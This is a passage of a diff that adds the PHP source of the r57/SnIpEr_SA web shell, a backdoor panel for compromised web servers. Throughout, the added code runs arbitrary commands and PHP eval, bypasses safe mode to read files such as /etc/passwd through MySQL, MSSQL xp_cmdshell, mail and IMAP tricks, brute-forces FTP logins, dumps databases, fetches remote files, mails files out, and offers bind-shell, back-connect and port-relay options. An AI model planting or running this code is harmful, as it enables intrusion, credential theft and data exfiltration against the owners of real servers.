+ case 'test2':
+ @include($_POST['test2_file']);
+ break;
+ case 'test3':
+ if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+ $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+ if($db)
+ {
+ if(@mysql_select_db($_POST['test3_md'],$db))
+ {
+ @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+ @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+ @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+ $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+ while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+ @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mysql_close($db);
+ }
+ else echo "[-] ERROR! 
Can't connect to mysql server";
+ break;
+ case 'test4':
+ if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+ $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+ if($db)
+ {
+ if(@mssql_select_db($_POST['test4_md'],$db))
+ {
+ @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+ @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+ @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+ $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+ while(($row=@mssql_fetch_row($res)))
+ {
+ echo $row[0]."\r\n";
+ }
+ @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mssql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'test5':
+ if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+ $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+ @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+ $lines = file ('/tmp/mb_send_mail');
+ foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+ break;
+ case 'test6':
+ $stream = @imap_open('/etc/passwd', "", "");
+ $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+ for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+ @imap_close($stream);
+ break;
+ case 'test7':
+ $stream = @imap_open($_POST['test7_file'], "", "");
+ $str = @imap_body($stream, 1);
+ echo $str;
+ @imap_close($stream);
+ break;
+ case 'test8':
+ if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+ else echo $lang[$language.'_text119'];
+ break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; 
}
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+ {
+ $connection = @ftp_connect($ftp_server,$ftp_port,10);
+ if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+ else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+ @ftp_close($connection);
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+ if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+ else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+ else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+ else {
+ if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+ else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+ else { echo "[-] ERROR! 
Can't write in dump file"; }
+ }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+ return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo 
sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo 
sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." 
* ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; +echo 
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo 
$fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo 
$table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&$unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' 
'.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo 
sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." 
( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo 
sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' 
<b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' 
<b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&$unix){ +echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? 
(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
